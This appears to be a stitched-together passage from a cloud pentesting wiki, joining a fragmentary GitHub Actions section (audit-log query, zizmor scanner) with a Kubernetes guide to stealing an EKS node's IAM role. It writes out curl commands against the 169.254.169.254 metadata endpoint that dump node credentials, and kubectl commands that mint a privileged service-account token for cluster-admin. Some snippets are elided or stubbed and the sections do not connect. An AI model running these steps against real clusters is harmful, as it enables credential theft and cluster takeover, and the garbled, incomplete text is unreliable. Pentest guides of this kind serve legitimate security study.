## Basic Information
In this page you will find:

An organization in GitHub is very proactive in reporting accounts to GitHub.

> [!WARNING]
> The only way for an organization to figure out they have been targeted is to check the GitHub audit logs from their SIEM, since the PR would be removed from the GitHub UI.
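
For example, the removed PR activity can still be recovered from the org audit log API instead of the UI (a hedged sketch: `$ORG` is a placeholder, the `/orgs/{org}/audit-log` endpoint requires GitHub Enterprise Cloud and a token with the `read:audit_log` scope, and the exact `action` filter may need tuning):

```bash
# List recent pull request creations recorded in the org audit log
gh api "/orgs/$ORG/audit-log?phrase=action:pull_request.create&per_page=100" \
  --paginate --jq '.[] | [.["@timestamp"], .actor, .repo, .action] | @tsv'
```
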
## Tools
The following tools are useful to find GitHub Actions workflows and even find vulnerable ones:

- [https://github.com/zizmorcore/zizmor](https://github.com/zizmorcore/zizmor) - Check also its checklist in [https://docs.zizmor.sh/audits](https://docs.zizmor.sh/audits)
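
For instance, a minimal way to run zizmor against a local checkout (a sketch; it assumes installation from PyPI, and `--offline` restricts it to audits that don't need the GitHub API):

```bash
pip install zizmor
# Statically audit every workflow in the repository; drop --offline and
# export GH_TOKEN to also run the audits that query the GitHub API
zizmor --offline .github/workflows/
```
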

---

_The rest of this section belongs to `src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md`._

```bash
# Loop over every namespace looking for pods/SAs tied to an AWS IAM role
for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
    : # (per-namespace commands elided in the diff)
done | grep -B 1 "amazonaws.com"
```

### Node IAM Role to cluster-admin
The previous section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node will very likely **have an IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth trying it on each node_).

To access the node metadata endpoint you need one of the following:

- Be in a pod on a node whose metadata endpoint allows at least 2 TCP hops (the `HttpPutResponseHopLimit` setting). This is the most common misconfiguration: several pods in a cluster usually need the metadata endpoint to work properly, so many companies simply allow access to it from every pod in the cluster.
- Be in a pod with `hostNetwork` enabled.
- Escape to the node and access the metadata endpoint directly.

(Note that the metadata endpoint is at 169.254.169.254 as always).
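
For instance, once one of the conditions above holds, the node's role credentials can be dumped from a pod with plain IMDSv2 calls (a minimal sketch, no extra tooling assumed):

```bash
# Get an IMDSv2 session token; this PUT is exactly what fails when the
# node's hop limit is 1 and the pod isn't using hostNetwork
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Name of the node IAM role, then its temporary credentials
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
```
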
To **escape to the node** you can use the following command to run a pod with `hostNetwork` enabled:

```bash
# (start of the snippet elided; it fills $IAM_ROLE_NAME from the metadata endpoint)
if [ "$IAM_ROLE_NAME" ]; then
    echo "Node IAM role: $IAM_ROLE_NAME"
fi
```

### Privesc to cluster-admin
In summary: if it's possible to **access the EKS Node IAM role** from a pod, it's possible to **compromise the full kubernetes cluster**.

For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). In summary, the IAM role that is assigned to EKS nodes by default is granted the `system:node` role inside the cluster. This role is very interesting, although it is limited by the kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction) admission controller.

However, the node can always **generate tokens for service accounts** running in pods on the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate it, like in the sketch below.
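
(A hedged sketch: `my-cluster`, `privileged-pod` and `privileged-sa` are placeholder names, and the NodeRestriction admission controller only allows tokens bound to a pod actually scheduled on this node.)

```bash
# Authenticate to the cluster as the node using the stolen IAM role creds
# (AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN exported)
aws eks update-kubeconfig --name my-cluster --kubeconfig ./node-kubeconfig

# Mint a token for the privileged SA via the TokenRequest API, bound to a
# pod running on this node to satisfy NodeRestriction
POD_UID=$(kubectl --kubeconfig ./node-kubeconfig -n kube-system \
  get pod privileged-pod -o jsonpath='{.metadata.uid}')
kubectl --kubeconfig ./node-kubeconfig -n kube-system create token privileged-sa \
  --bound-object-kind Pod --bound-object-name privileged-pod \
  --bound-object-uid "$POD_UID"
```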